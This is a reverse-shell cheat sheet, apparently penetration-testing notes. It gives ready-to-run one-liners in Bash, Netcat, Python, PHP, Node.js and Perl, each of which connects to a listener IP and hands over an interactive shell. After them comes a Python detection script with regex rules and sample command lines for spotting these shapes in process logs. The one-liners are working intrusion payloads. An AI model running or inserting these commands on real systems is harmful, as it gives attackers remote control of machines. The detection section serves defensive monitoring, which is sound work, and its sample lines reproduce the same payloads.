Reverse Shells

Bash

bash -i >& /dev/tcp/10.10.10.10/9001 0>&1

Netcat

/bin/nc -nv 192.168.45.155 9090 -e /bin/bash

Python

To create a reverse shell with Python, we create a socket, connect to our listener, duplicate the socket onto the standard input, output, and error descriptors, and call /bin/sh with subprocess.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.155",9090));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP

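The commands below instruct PHP to run (-r) the code within the quotes. Each variant opens the socket with fsockopen() and differs only in the function used to start the shell: exec, shell_exec, system, passthru, or popen.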

php -r '$sock=fsockopen("192.168.45.155",9090);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("192.168.45.155",9090);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

Node.js

The initial command injection places a malicious file in a world-writable directory (/var/tmp) and runs it with node. The file calls the exec() function of the Node.js child_process module, which contains the Netcat reverse shell payload.

echo "require('child_process').exec('nc -nv 192.168.45.155 9090 -e /bin/bash')" > /var/tmp/offsec.js ; node /var/tmp/offsec.js

Perl

We import the Socket module, set up our IP and port, and pass these into a socket call. We then initialize the TCP connection (connect()), reopen STDIN, STDOUT, and STDERR on the socket, and call /bin/sh.

perl -e 'use Socket;$i="192.168.45.155";$p=9090;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
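Detection side, as an added example that is not part of the original page: a Python check that flags the command-line shapes of the one-liners above in process-execution logs. The rule names, the /tmp and /dev/shm paths in the Node.js rule, and the SAMPLE lines (constructed, using documentation addresses) are assumptions.

```python
import re

# One rule per one-liner family on this page; the labels are hypothetical names.
RULES = [
    ("dev-tcp", re.compile(r"/dev/tcp/[\w.-]+/\d+")),
    ("netcat-exec", re.compile(r"\b(?:nc|ncat|netcat)\b.*\s-e\s+\S*/(?:ba)?sh\b")),
    ("python-socket-dup2",
     re.compile(r"\bpython[\d.]*\b.*\bsocket\.socket\(.*\bos\.dup2\(", re.S)),
    ("php-fsockopen", re.compile(
        r"\bphp[\d.]*\b.*\bfsockopen\(.*"
        r"\b(?:exec|shell_exec|system|passthru|popen)\(.*[<>]&\d", re.S)),
    # Script run from a world-writable directory (/var/tmp is the page's case).
    ("node-tmp-script",
     re.compile(r"\bnode(?:js)?\s+/(?:var/tmp|tmp|dev/shm)/\S+\.js\b")),
    ("perl-socket",
     re.compile(r'\bperl\b.*\buse Socket\b.*open\(STD(?:IN|OUT|ERR),\s*">&', re.S)),
]

# Constructed process command lines (not real logs); the last three are benign.
SAMPLE = r'''
bash -i >& /dev/tcp/192.0.2.10/9001 0>&1
/bin/nc -nv 192.0.2.10 9090 -e /bin/bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.0.2.10",9090));os.dup2(s.fileno(),0);subprocess.call(["/bin/sh","-i"])'
php -r '$sock=fsockopen("192.0.2.10",9090);system("/bin/sh -i <&3 >&3 2>&3");'
node /var/tmp/a.js
perl -e 'use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));open(STDIN,">&S");exec("/bin/sh -i");'
nc -zv 192.0.2.10 443
python3 -c 'import socket; print(socket.gethostname())'
node /srv/app/server.js
'''.strip().splitlines()

def classify(cmdline):
    """Return the labels of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def scan(cmdlines):
    """Return (line_number, labels) for each command line that matched a rule."""
    hits = []
    for n, line in enumerate(cmdlines, 1):
        labels = classify(line)
        if labels:
            hits.append((n, labels))
    return hits

if __name__ == "__main__":
    for n, labels in scan(SAMPLE):
        print(n, ",".join(labels), SAMPLE[n - 1][:60])
```

These patterns match the literal forms shown on this page; treat a hit as a lead to correlate with the outbound connection and the parent process, not as a verdict.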
